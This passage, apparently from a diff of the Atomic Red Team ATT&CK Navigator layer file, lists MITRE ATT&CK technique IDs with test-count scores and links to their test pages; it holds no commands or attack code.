Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"}]},{"techniqueID":"T1098","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.001","score":3,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":29,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"links":[{"label":"View 